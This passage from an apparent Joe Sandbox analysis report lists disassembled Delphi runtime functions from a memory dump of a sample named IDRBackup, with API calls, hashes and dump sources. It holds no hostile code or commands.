                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Stringx20$LoadRaiseRecxiStringpx14Sysutils@Text$qqrxusTypeVariants@$Asg$qqrr20Cat3$qqrr20Except$qqrvException@$bctr$qqrx20String$qqrp20Stringt2$CharClassClassoCreate$qqrp17Error$qqrucFindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3925043654-0
                                                                                                  • Opcode ID: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                  • Instruction ID: 4ca92997f7d99f258bade771785e71a5bab742ac08337daf03ab8f9c2463306d
                                                                                                  • Opcode Fuzzy Hash: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                  • Instruction Fuzzy Hash: 11212A749056888FEB05CBE8E891AEEB7F5EB58300F40866AE904A3341D7749A058BA1
                                                                                                  Function 50016084 Relevance: 15.2, APIs: 10, Instructions: 186COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 500160A1
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500160F4
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016157
                                                                                                  • CharUpperBuffA.USER32(?,00000100), ref: 500161CB
                                                                                                  • @System@@UniqueStringA$qqrr27System@%AnsiStringT$us$i0$%.RTL120(?,00000100), ref: 500161D3
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,00000100), ref: 500161F4
                                                                                                  • CharUpperBuffA.USER32(00000000,?,?,00000100), ref: 50016204
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016266
                                                                                                  • @System@@EnsureAnsiString$qqrr27System@%AnsiStringT$us$i0$%us.RTL120 ref: 500162A8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50016309), ref: 500162FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiString$System@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$BuffCharUpper$A$qqrr27Clr$qqrpvEnsureRef$qqrpvString$qqrr27T$us$i0$%T$us$i0$%usUnique
                                                                                                  • String ID:
                                                                                                  • API String ID: 3754126448-0
                                                                                                  • Opcode ID: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                  • Instruction ID: 7aeabf7012fadaf89375e13735e907e93f1881e5daf33cb3c72b493a73839c93
                                                                                                  • Opcode Fuzzy Hash: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                  • Instruction Fuzzy Hash: A9718B30A042989FDB25CF68DC917D9B7F5AF45300F5082A6EA58DB242D7B1DEC4CB94
                                                                                                  Function 500163C4 Relevance: 15.2, APIs: 10, Instructions: 176COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016423
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016472
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 500164B2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 500164D1
                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,500165BA), ref: 500164E1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016536
                                                                                                  • @Character@TCharacter@IsLetterOrDigit$qqrb.RTL120(00000000,500165BA), ref: 50016561
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 5001656F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUnicode$System@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$BuffCharDigit$qqrbEnsureLetterString$qqrr20U$qqrr20UniqueUpper
                                                                                                  • String ID:
                                                                                                  • API String ID: 725871508-0
                                                                                                  • Opcode ID: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                  • Instruction ID: 371616eb350b96e3d621023fbff1a77728028cc82446cf9de742119a6f8d3487
                                                                                                  • Opcode Fuzzy Hash: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                  • Instruction Fuzzy Hash: B6616E30A0128A9FDF01CFA8DD816AEB7F6EF44314F608266E904EB255D770DE81CB90
                                                                                                  Function 5000A6D4 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A88E), ref: 5000A716
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5000A88E), ref: 5000A736
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A75D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A78A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A7C4
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120 ref: 5000A83E
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120 ref: 5000A843
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(00000001), ref: 5000A870
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$Unicode$StringSystem@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$ArrayLength$qqrv$EnsureLen$qqrx20String$qqrr20
                                                                                                  • String ID:
                                                                                                  • API String ID: 4245238830-0
                                                                                                  • Opcode ID: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                  • Instruction ID: 6d2edc206bd9f8d921c39b7a1cc1f24274515dbb8e96becc019c4f36c3429797
                                                                                                  • Opcode Fuzzy Hash: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                  • Instruction Fuzzy Hash: 4A518F30E0525ADFEB01DFA8C991AAEB7F1FF45300FA082B5D545A7251E774AE81CB80
                                                                                                  Function 5002C4DC Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C518
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C52D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C54A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C572
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C59B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5B8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5D7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$AnsiFromStr$qqrr20Stringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi$Builder@set_Length$qqriSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2984213798-0
                                                                                                  • Opcode ID: d771aad7a1874d2db2ddaa5cfad2ceeff1fee016059b6d5b291e9fd79e2b5735
                                                                                                  • Instruction ID: 068b442feed892b016037b59c515b6d51b768309edcd7f6c8bd425563627ec90
                                                                                                  • Opcode Fuzzy Hash: d771aad7a1874d2db2ddaa5cfad2ceeff1fee016059b6d5b291e9fd79e2b5735
                                                                                                  • Instruction Fuzzy Hash: 4141BE30701586DF9F11DF78EA8196DB7F6EF8421076483A5E505DB209EB70EE81DB80
                                                                                                  Function 50010060 Relevance: 15.1, APIs: 10, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001018B), ref: 5001008E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100AB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100E3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001018B), ref: 50010114
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001018B), ref: 50010119
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 50010136
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001018B), ref: 50010142
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5001018B), ref: 50010150
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$AnsiCharacter@FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1528459219-0
                                                                                                  • Opcode ID: b698632cdc252e54ea1ec76e779071d0cec8955af3992b6e9722cf331ee822e6
                                                                                                  • Instruction ID: a458a4b14fff98353ea6486d6640c8d5f1fac8ee108cf368196165f92ca042b4
                                                                                                  • Opcode Fuzzy Hash: b698632cdc252e54ea1ec76e779071d0cec8955af3992b6e9722cf331ee822e6
                                                                                                  • Instruction Fuzzy Hash: 5931B234A00289ABDF12DFA4DC916AFB7F5AF48300F5042A6E580A7251D7B59EC6C781
                                                                                                  Function 5002D3D8 Relevance: 15.1, APIs: 10, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D402
                                                                                                    • Part of subcall function 5002DF70: @Sysutils@TUnicodeEncoding@$bctr$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF82
                                                                                                    • Part of subcall function 5002DF70: InterlockedCompareExchange.KERNEL32(500A6CA4,00000000,00000000), ref: 5002DF92
                                                                                                    • Part of subcall function 5002DF70: @System@TObject@Free$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF9D
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D38D
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D396
                                                                                                    • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D3A1
                                                                                                  • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D41D
                                                                                                  • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D426
                                                                                                  • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D441
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D482
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4A6
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(5002D4D5,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$ArrayLength$qqrvSysutils@$Encoding@Unicode$qqrv$Endian$Array$qqrpvt1uiCompareEncoding@$bctr$qqrvExchangeFinalizeFree$qqrvInterlockedObject@System@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 84035370-0
                                                                                                  • Opcode ID: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                  • Instruction ID: 039153d2115dfd61d257ebf5085e828ad7449732c8b2836f1213e2f1a0251a10
                                                                                                  • Opcode Fuzzy Hash: adccd838f023833192a6ea8ef32ba18dfceb28250b807702a089e8f6cb3e4738
                                                                                                  • Instruction Fuzzy Hash: 7E31AC745029869FDB04FFA0F49156DB3B5EF99310B2042A7F8019B355DB30AD03DAE2
                                                                                                  Function 5002BA88 Relevance: 15.1, APIs: 10, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BAC9
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAF8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAFD
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB20
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB25
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002BB82), ref: 5002BB31
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BB4E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002BB82), ref: 5002BB67
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$System@@$AnsiFromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Unicode$Except$qqrvException@$bctr$qqrp20InternalRaiseRecpx14Recxi$Builder@set_Length$qqriMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2643269361-0
                                                                                                  • Opcode ID: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                  • Instruction ID: 9b41787f5445ca965e8b445f3d3e889d29c8efd9642bd8e15586ab18e8b0b9b5
                                                                                                  • Opcode Fuzzy Hash: 0708b84ccf3e92e627d5ed3dd2509e173c6bcd433ac113f8520e2423efd052c3
                                                                                                  • Instruction Fuzzy Hash: 1931A430A011869FDB11DFA8ED91AADB7F9EF94304F54C2A6E50097256DB70EE04CBD0
                                                                                                  Function 500275A0 Relevance: 15.1, APIs: 10, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50027676), ref: 500275C8
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,50027676), ref: 500275D0
                                                                                                    • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                    • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                    • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50027676), ref: 500275DC
                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,50027676), ref: 500275E2
                                                                                                  • @System@@GetMem$qqri.RTL120(00000000,?,00000000,50027676), ref: 500275EF
                                                                                                    • Part of subcall function 50003FB0: @System@SysGetMem$qqri.RTL120 ref: 50003FB4
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027611
                                                                                                  • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027617
                                                                                                  • VerQueryValueW.VERSION(?,50027688,?,?,00000000,?,00000000,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027631
                                                                                                  • @System@@FreeMem$qqrpv.RTL120(50027660,?,00000000,50027659,?,00000000,?,00000000,50027676), ref: 50027653
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
